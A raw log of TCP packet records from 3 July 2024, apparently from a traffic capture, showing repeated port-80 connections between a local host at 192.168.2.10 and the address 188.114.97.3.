                                                    Jul 3, 2024 16:42:22.332765102 CEST4973280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.332878113 CEST8049731188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:22.333447933 CEST4973180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.337796926 CEST8049732188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:22.682444096 CEST4973280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:22.687310934 CEST8049732188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:22.794450045 CEST8049732188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:22.978790998 CEST4973280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.141895056 CEST8049732188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.216680050 CEST4973380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.222104073 CEST8049733188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.222171068 CEST4973380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.222450018 CEST4973380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.227879047 CEST8049733188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.230195999 CEST8049732188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.230293036 CEST4973280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.357163906 CEST4973480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.366344929 CEST8049734188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.366961002 CEST4973480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.367151022 CEST4973480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.374411106 CEST8049734188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.572700977 CEST4973380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.689896107 CEST8049733188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.690681934 CEST8049733188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.691099882 CEST8049733188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.713455915 CEST4973480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.719759941 CEST8049734188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.791394949 CEST4973380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:23.825880051 CEST8049734188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:23.978780031 CEST4973480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.117372990 CEST8049733188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:24.172522068 CEST8049734188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:24.291297913 CEST4973380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.291425943 CEST4973480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.292030096 CEST4973380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.292040110 CEST4973280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.292104006 CEST4973480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.292999983 CEST4973580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.297318935 CEST8049733188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:24.297384024 CEST4973380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.297987938 CEST8049735188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:24.298062086 CEST4973580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.298254967 CEST4973580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.299014091 CEST8049732188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:24.299066067 CEST4973280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.299068928 CEST8049734188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:24.299114943 CEST4973480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.303067923 CEST8049735188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:24.650808096 CEST4973580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:24.656203985 CEST8049735188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:24.753422022 CEST8049735188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:24.970609903 CEST8049735188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:24.970676899 CEST4973580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:25.093204975 CEST8049735188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:25.096267939 CEST4973580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:25.101633072 CEST8049735188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:25.101712942 CEST4973580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:25.243680954 CEST4973680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:25.248677969 CEST8049736188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:25.252438068 CEST4973680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:25.259377003 CEST4973680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:25.264990091 CEST8049736188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:25.604111910 CEST4973680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:25.777451038 CEST8049736188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:25.778786898 CEST8049736188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:25.822551012 CEST4973680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:26.057024002 CEST8049736188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:26.103768110 CEST4973680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:26.181086063 CEST4973680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:26.181884050 CEST4973780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:26.186839104 CEST8049737188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:26.186919928 CEST4973780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:26.187046051 CEST4973780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:26.189831018 CEST8049736188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:26.189893007 CEST4973680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:26.192199945 CEST8049737188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:26.541495085 CEST4973780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:26.546662092 CEST8049737188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:26.682478905 CEST8049737188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:26.728841066 CEST4973780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:27.008877993 CEST8049737188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:27.056904078 CEST4973780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:27.134216070 CEST4973780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:27.135137081 CEST4973880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:27.140188932 CEST8049737188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:27.140212059 CEST8049738188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:27.140264988 CEST4973780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:27.140295982 CEST4973880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:27.140454054 CEST4973880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:27.148288012 CEST8049738188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:27.496376038 CEST4973880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:27.501497030 CEST8049738188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:27.590604067 CEST8049738188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:27.635027885 CEST4973880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:27.935386896 CEST8049738188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:27.978775024 CEST4973880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:28.058948040 CEST4973880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:28.059730053 CEST4973980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:28.064625025 CEST8049738188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:28.064649105 CEST8049739188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:28.064680099 CEST4973880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:28.064723969 CEST4973980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:28.064877033 CEST4973980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:28.069771051 CEST8049739188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:28.416408062 CEST4973980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:28.421412945 CEST8049739188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:28.518400908 CEST8049739188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:28.572566986 CEST4973980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:28.853379965 CEST8049739188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:28.900697947 CEST4973980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:28.994259119 CEST4973980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:28.999146938 CEST4974080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:28.999950886 CEST8049739188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:29.000041008 CEST4973980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:29.004928112 CEST8049740188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:29.008368969 CEST4974080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:29.008456945 CEST4974080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:29.014005899 CEST8049740188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:29.123955011 CEST4974180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:29.124082088 CEST4974080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:29.129949093 CEST8049741188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:29.132379055 CEST4974180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:29.166922092 CEST4974180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:29.170597076 CEST8049740188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:29.172007084 CEST8049741188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:29.350794077 CEST4974280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:29.355860949 CEST8049742188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:29.355931997 CEST4974280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:29.356059074 CEST4974280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:29.360922098 CEST8049742188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:29.383296967 CEST8049740188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:29.383359909 CEST4974080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:29.525845051 CEST4974180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:29.531395912 CEST8049741188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:29.531423092 CEST8049741188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:29.605021000 CEST8049741188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:29.650696993 CEST4974180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:29.713443995 CEST4974280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:29.722062111 CEST8049742188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:29.813816071 CEST8049742188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:29.869486094 CEST4974280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:29.959417105 CEST8049741188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:30.010057926 CEST4974180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:30.150537014 CEST8049742188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:30.197545052 CEST4974280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:30.374747992 CEST4974180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:30.374808073 CEST4974280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:30.375799894 CEST4974380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:30.380343914 CEST8049741188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:30.380403042 CEST4974180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:30.380901098 CEST8049743188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:30.381050110 CEST4974380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:30.381084919 CEST8049742188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:30.381181955 CEST4974280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:30.381244898 CEST4974380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:30.386060953 CEST8049743188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:30.728904009 CEST4974380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:30.733762026 CEST8049743188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:30.838303089 CEST8049743188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:30.885094881 CEST4974380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:31.185659885 CEST8049743188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:31.228914022 CEST4974380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:31.306938887 CEST4974480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:31.312228918 CEST8049744188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:31.312324047 CEST4974480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:31.312539101 CEST4974480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:31.317869902 CEST8049744188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:31.666497946 CEST4974480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:31.671569109 CEST8049744188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:31.763647079 CEST8049744188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:31.806979895 CEST4974480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:32.099236965 CEST8049744188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:32.150670052 CEST4974480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:32.229037046 CEST4974480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:32.229810953 CEST4974580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:32.234916925 CEST8049745188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:32.235022068 CEST4974580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:32.235315084 CEST4974580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:32.240653038 CEST8049745188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:32.244554043 CEST8049744188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:32.244625092 CEST4974480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:32.588375092 CEST4974580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:32.593346119 CEST8049745188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:32.717751026 CEST8049745188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:32.760083914 CEST4974580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:33.061202049 CEST8049745188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:33.103940964 CEST4974580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:33.181332111 CEST4974580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:33.182301998 CEST4974680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:33.187419891 CEST8049745188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:33.187515974 CEST4974580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:33.187954903 CEST8049746188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:33.188020945 CEST4974680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:33.188224077 CEST4974680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:33.194968939 CEST8049746188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:33.541723013 CEST4974680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:33.546993971 CEST8049746188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:33.663880110 CEST8049746188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:33.713176012 CEST4974680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:34.013711929 CEST8049746188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:34.060333967 CEST4974680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:34.134903908 CEST4974680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:34.135818005 CEST4974780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:34.141511917 CEST8049747188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:34.141742945 CEST4974780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:34.141742945 CEST4974780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:34.142374992 CEST8049746188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:34.142440081 CEST4974680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:34.147669077 CEST8049747188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:34.494729042 CEST4974780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:34.500586987 CEST8049747188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:34.612957001 CEST8049747188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:34.666323900 CEST4974780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:34.947860956 CEST8049747188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:34.975198984 CEST4974880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:34.983766079 CEST8049748188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:34.983858109 CEST4974880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:34.987618923 CEST4974880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:34.992818117 CEST8049748188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:34.996232986 CEST4974780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:35.198935032 CEST4974980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:35.205996037 CEST8049749188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:35.206070900 CEST4974980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:35.206255913 CEST4974980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:35.211819887 CEST8049749188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:35.340346098 CEST4974880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:35.346280098 CEST8049748188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:35.346296072 CEST8049748188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:35.450520992 CEST8049748188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:35.494555950 CEST4974880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:35.557178974 CEST4974980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:35.567198038 CEST8049749188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:35.665199041 CEST8049749188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:35.713191986 CEST4974980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:35.794322968 CEST8049748188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:35.838165998 CEST4974880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.016758919 CEST8049749188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.053545952 CEST4974780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.053920984 CEST4974880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.054222107 CEST4974980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.059273005 CEST8049747188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.059382915 CEST4974780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.060106993 CEST8049748188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.060189962 CEST4974880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.060255051 CEST8049749188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.151065111 CEST8049749188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.151331902 CEST4974980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.156584024 CEST8049749188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.166033030 CEST4975080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.167012930 CEST4974980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.174119949 CEST8049750188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.174437046 CEST8049749188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.174550056 CEST4974980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.174698114 CEST4975080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.174698114 CEST4975080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.179776907 CEST8049750188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.189017057 CEST4975180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.194044113 CEST8049751188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.194252014 CEST4975180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.194538116 CEST4975180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.199659109 CEST8049751188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.525840044 CEST4975080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.531174898 CEST8049750188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.541493893 CEST4975180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.546895981 CEST8049751188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.546905041 CEST8049751188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.624550104 CEST8049750188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.655148983 CEST8049751188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.666313887 CEST4975080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.697562933 CEST4975180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.856863022 CEST8049751188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.900743008 CEST4975180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.974387884 CEST8049750188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:36.975984097 CEST4975080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:36.980998993 CEST8049750188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:37.071537018 CEST8049750188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:37.071774006 CEST4975080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:37.077760935 CEST8049750188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:37.077918053 CEST8049750188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:37.103522062 CEST4975180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:37.105705023 CEST4975280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:37.110475063 CEST8049751188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:37.110563993 CEST4975180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:37.111640930 CEST8049752188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:37.111716032 CEST4975280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:37.111917973 CEST4975280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:37.119272947 CEST8049752188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:37.397105932 CEST8049750188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:37.447585106 CEST4975080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:37.467463017 CEST4975280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:37.472500086 CEST8049752188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:37.595010042 CEST8049752188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:37.650775909 CEST4975280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:37.930494070 CEST8049752188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:37.978816986 CEST4975280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:38.056514025 CEST4975080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:38.056739092 CEST4975280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:38.057532072 CEST4975380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:38.062881947 CEST8049750188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:38.062936068 CEST4975080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:38.063174963 CEST8049753188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:38.063240051 CEST4975380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:38.063424110 CEST4975380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:38.063680887 CEST8049752188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:38.063739061 CEST4975280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:38.069039106 CEST8049753188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:38.416501999 CEST4975380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:38.422385931 CEST8049753188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:38.530325890 CEST8049753188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:38.572590113 CEST4975380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:38.865123034 CEST8049753188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:38.916312933 CEST4975380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:38.955540895 CEST8049753188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:39.010072947 CEST4975380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:39.074140072 CEST4975480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:39.079341888 CEST8049754188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:39.079469919 CEST4975480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:39.079619884 CEST4975480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:39.084425926 CEST8049754188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:39.432176113 CEST4975480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:39.438019991 CEST8049754188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:39.539979935 CEST8049754188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:39.588248968 CEST4975480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:39.756047964 CEST8049754188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:39.806957960 CEST4975480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:39.847882986 CEST8049754188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:39.900754929 CEST4975480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:39.994409084 CEST4975480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:39.995306015 CEST4975580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:40.007857084 CEST8049755188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:40.007952929 CEST4975580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:40.008383036 CEST8049754188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:40.008435965 CEST4975480192.168.2.10188.114.97.3
